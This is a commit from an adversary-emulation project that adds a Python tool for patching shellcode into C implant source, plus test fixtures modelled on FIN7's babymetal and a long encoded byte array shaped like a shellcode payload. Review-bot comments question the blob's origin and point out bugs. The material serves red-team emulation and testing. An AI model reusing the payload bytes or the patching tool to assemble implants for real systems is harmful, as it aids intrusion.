mirror of https://github.com/avast/PurpleDome
Adding tool to patch a shellcode into a C code file
parent
85628336be
commit
d765456f39
@ -0,0 +1,3 @@
|
|||||||
|
data for the insert_shellcode tool
|
||||||
|
|
||||||
|
babymetal.cpp: A simulation of babymetal.cpp from FIN7
|
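--- /dev/null
+++ b/tests/data/insert_shellcode/babymetal.cpp
@@ -0,0 +1,32 @@
+// inspired by https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp
+// where the insert_shellcode.py tool is first needed
+
+This is tricky;
+C code simulation;
+Must not be overwritten;
+
+unsigned char buf[] = "Leave me be";
+
+unsigned char buf[] =
+"So not touch"
+"This buf"
+;
+
+//right before
+unsigned char buf[] =
+"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
+"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
+"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
+"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
+;
+// right after
+
+
+But the shellcode must be overwritten and extended.
+
+unsigned char buf[] = "Leave me be";
+
+unsigned char buf[] =
+"So not touch"
+"This buf"
+;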
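--- /dev/null
+++ b/tests/data/insert_shellcode/shellcode.c
@@ -0,0 +1,48 @@
+unsigned char buf[] =
+"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
+"\x3c\x25\x5c\xbf\x08\x25\xe6\x3f\x0d\x3b\x25\xe6\x3f\x75\x25"
+"\xe6\x3f\x4d\x20\x5c\xa4\x25\xe6\x1f\x3d\x25\x62\xda\x27\x27"
+"\x25\x5c\xad\xc1\x51\x0c\x11\x6f\x41\x4d\x2c\xac\xa4\x60\x2c"
+"\x6c\xac\x8f\x80\x3f\x2c\x3c\x25\xe6\x3f\x4d\xe6\x2f\x51\x25"
+"\x6c\xbd\x0b\xec\x15\x75\x66\x6f\x62\xe8\x1f\x6d\x6d\x6d\xe6"
+"\xed\xe5\x6d\x6d\x6d\x25\xe8\xad\x19\x0a\x25\x6c\xbd\x29\xe6"
+"\x2d\x4d\x24\x6c\xbd\xe6\x25\x75\x3d\x8e\x3b\x25\x92\xa4\x20"
+"\x5c\xa4\x2c\xe6\x59\xe5\x25\x6c\xbb\x25\x5c\xad\x2c\xac\xa4"
+"\x60\xc1\x2c\x6c\xac\x55\x8d\x18\x9c\x21\x6e\x21\x49\x65\x28"
+"\x54\xbc\x18\xb5\x35\x29\xe6\x2d\x49\x24\x6c\xbd\x0b\x2c\xe6"
+"\x61\x25\x29\xe6\x2d\x71\x24\x6c\xbd\x2c\xe6\x69\xe5\x2c\x35"
+"\x2c\x35\x33\x34\x25\x6c\xbd\x37\x2c\x35\x2c\x34\x2c\x37\x25"
+"\xee\x81\x4d\x2c\x3f\x92\x8d\x35\x2c\x34\x37\x25\xe6\x7f\x84"
+"\x26\x92\x92\x92\x30\x25\x5c\xb6\x3e\x24\xd3\x1a\x04\x03\x04"
+"\x03\x08\x19\x6d\x2c\x3b\x25\xe4\x8c\x24\xaa\xaf\x21\x1a\x4b"
+"\x6a\x92\xb8\x3e\x3e\x25\xe4\x8c\x3e\x37\x20\x5c\xad\x20\x5c"
+"\xa4\x3e\x3e\x24\xd7\x57\x3b\x14\xca\x6d\x6d\x6d\x6d\x92\xb8"
+"\x85\x61\x6d\x6d\x6d\x5c\x54\x5f\x43\x5c\x5b\x55\x43\x5d\x43"
+"\x59\x6d\x37\x25\xe4\xac\x24\xaa\xad\xd6\x6c\x6d\x6d\x20\x5c"
+"\xa4\x3e\x3e\x07\x6e\x3e\x24\xd7\x3a\xe4\xf2\xab\x6d\x6d\x6d"
+"\x6d\x92\xb8\x85\xf4\x6d\x6d\x6d\x42\x32\x20\x2c\x3a\x34\x5f"
+"\x1f\x32\x05\x5a\x0f\x25\x1c\x20\x0c\x1c\x1d\x5e\x5f\x5a\x14"
+"\x2c\x2b\x2c\x08\x1a\x1d\x1f\x32\x07\x55\x1f\x01\x1f\x54\x3a"
+"\x17\x27\x0f\x5a\x1e\x03\x05\x22\x04\x3a\x09\x21\x1f\x2a\x38"
+"\x32\x02\x1d\x38\x2e\x2f\x54\x0f\x35\x3b\x28\x5f\x14\x22\x20"
+"\x0e\x1c\x5a\x1d\x5c\x3b\x55\x1d\x1b\x3e\x28\x39\x1b\x5b\x27"
+"\x5d\x55\x05\x26\x08\x3a\x39\x29\x25\x54\x0e\x14\x34\x1b\x07"
+"\x35\x0c\x1d\x1d\x0b\x18\x0f\x05\x1f\x3d\x0f\x39\x3b\x01\x24"
+"\x59\x25\x28\x2f\x27\x1e\x1f\x5c\x5a\x1b\x3e\x2f\x34\x5f\x18"
+"\x35\x3d\x15\x54\x01\x23\x2b\x2b\x0e\x29\x38\x5e\x29\x04\x3a"
+"\x5b\x17\x20\x37\x5c\x2c\x32\x1d\x07\x3b\x6d\x25\xe4\xac\x3e"
+"\x37\x2c\x35\x20\x5c\xa4\x3e\x25\xd5\x6d\x5f\xc5\xe9\x6d\x6d"
+"\x6d\x6d\x3d\x3e\x3e\x24\xaa\xaf\x86\x38\x43\x56\x92\xb8\x25"
+"\xe4\xab\x07\x67\x32\x25\xe4\x9c\x07\x72\x37\x3f\x05\xed\x5e"
+"\x6d\x6d\x24\xe4\x8d\x07\x69\x2c\x34\x24\xd7\x18\x2b\xf3\xeb"
+"\x6d\x6d\x6d\x6d\x92\xb8\x20\x5c\xad\x3e\x37\x25\xe4\x9c\x20"
+"\x5c\xa4\x20\x5c\xa4\x3e\x3e\x24\xaa\xaf\x40\x6b\x75\x16\x92"
+"\xb8\xe8\xad\x18\x72\x25\xaa\xac\xe5\x7e\x6d\x6d\x24\xd7\x29"
+"\x9d\x58\x8d\x6d\x6d\x6d\x6d\x92\xb8\x25\x92\xa2\x19\x6f\x86"
+"\xc7\x85\x38\x6d\x6d\x6d\x3e\x34\x07\x2d\x37\x24\xe4\xbc\xac"
+"\x8f\x7d\x24\xaa\xad\x6d\x7d\x6d\x6d\x24\xd7\x35\xc9\x3e\x88"
+"\x6d\x6d\x6d\x6d\x92\xb8\x25\xfe\x3e\x3e\x25\xe4\x8a\x25\xe4"
+"\x9c\x25\xe4\xb7\x24\xaa\xad\x6d\x4d\x6d\x6d\x24\xe4\x94\x24"
+"\xd7\x7f\xfb\xe4\x8f\x6d\x6d\x6d\x6d\x92\xb8\x25\xee\xa9\x4d"
+"\xe8\xad\x19\xdf\x0b\xe6\x6a\x25\x6c\xae\xe8\xad\x18\xbf\x35"
+"\xae\x35\x07\x6d\x34\xd6\x8d\x70\x47\x67\x2c\xe4\xb7\x92\xb8";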
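Review bot: Nothing in this fixture says what the 48-line `buf[]` blob is or where it came from, so a reader cannot tell inert test data from a live payload, and a payload-shaped byte string committed to the tree is the kind of file endpoint AV quarantines on checkout, which would break the test that depends on it. Since `insert_shellcode.py` only performs a textual replacement of an `unsigned char buf[] = "\x.."` block, a short synthetic byte pattern would exercise the tool equally well. If the real bytes are kept, a header comment such as `// test fixture for insert_shellcode.py: opaque bytes used only as replacement text; origin: <SOURCE-NOT-ON-PAGE>` should name their origin so the file is not mistaken for an artifact.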
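--- /dev/null
+++ b/UNKNOWN_DIR/insert_shellcode.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+
+# Inserts multi line shellcode into a C-file with a placeholder shellcode. Overwriting the placeholder
+#
+
+
+import re
+import argparse
+
+
+def replace(args):
+    """ Replace a specified placeholder part in a file with the shellcode in the shellcode file
+
+    :param original_file:
+    :param placeholder_pattern:
+    :param shellcode_file:
+    :param out_file:
+    :return:
+    """
+
+    original_file = args.original_file
+    placeholder_pattern = args.placeholder_pattern
+    shellcode_file = args.shellcode_file
+    out_file = args.out_file
+
+    with open(shellcode_file, "rt") as fh:
+        replacement = fh.read()
+
+    with open(original_file, "rt") as fh:
+        original = fh.read()
+
+    s = re.split(placeholder_pattern, original, maxsplit=1, flags=re.S)
+    print(s[0], replacement, s[1])
+
+    with open(out_file, "wt") as fh:
+        fh.write(s[0])
+        fh.write(replacement)
+        fh.write(s[1])
+    # res = re.sub(placeholder_pattern, replacement, original)
+    # print(res)
+
+
+def create_parser():
+    """ Creates the parser for the command line arguments"""
+
+    parser = argparse.ArgumentParser("A tool to patch a shellcode into a C source file")
+
+    parser.set_defaults(func=replace)
+    parser.set_defaults(placeholder_pattern=r'unsigned char \w*\[\] =.{0,1}"\\x\d\d[^;]*".{0,1};')
+    parser.add_argument('--original_file', default="../tests/data/insert_shellcode/babymetal.cpp", help="The original C code with a shellcode to replace")
+    parser.add_argument('--shellcode_file', default="../tests/data/insert_shellcode/shellcode.c", help="The shellcode C snippet to insert into the original file")
+    parser.add_argument('--out_file', default="patched.c", help="The resulting patched file")
+
+    return parser
+
+
+if __name__ == "__main__":
+    arguments = create_parser().parse_args()
+    arguments.func(arguments)
+    # replace("../tests/data/insert_shellcode/babymetal.cpp", r'unsigned char \w*\[\] =.{0,1}"\\x\d\d[^;]*".{0,1};', "../tests/data/insert_shellcode/shellcode.c", "result.txt")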
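Review bot: In `replace`, `re.split(..., maxsplit=1)` returns a one-element list when the placeholder pattern does not match, so `s[1]` in the `print` and the `fh.write` calls raises an IndexError after `out_file` has already been created empty, instead of reporting the missing placeholder; add `if len(s) != 2:` / `    raise SystemExit(f"placeholder pattern not found in {original_file}")` right after the `re.split` line. The default `placeholder_pattern` set in `create_parser` only matches a placeholder whose first escape is two decimal digits (`\\x\d\d`), so a buffer beginning with e.g. `\xfc` is silently left untouched; `\\x[0-9a-fA-F]{2}` matches any hex escape, and `.{0,1}` is presumably meant as optional whitespace, where `\s?` says so explicitly. The `print(s[0], replacement, s[1])` line dumps the entire patched file to stdout on every run and the commented-out `re.sub` and `replace(...)` lines are dead code; drop all three. The docstring lists four parameters the function no longer takes — it receives the argparse namespace `args` — and should be rewritten to describe the namespace fields it reads (`original_file`, `placeholder_pattern`, `shellcode_file`, `out_file`).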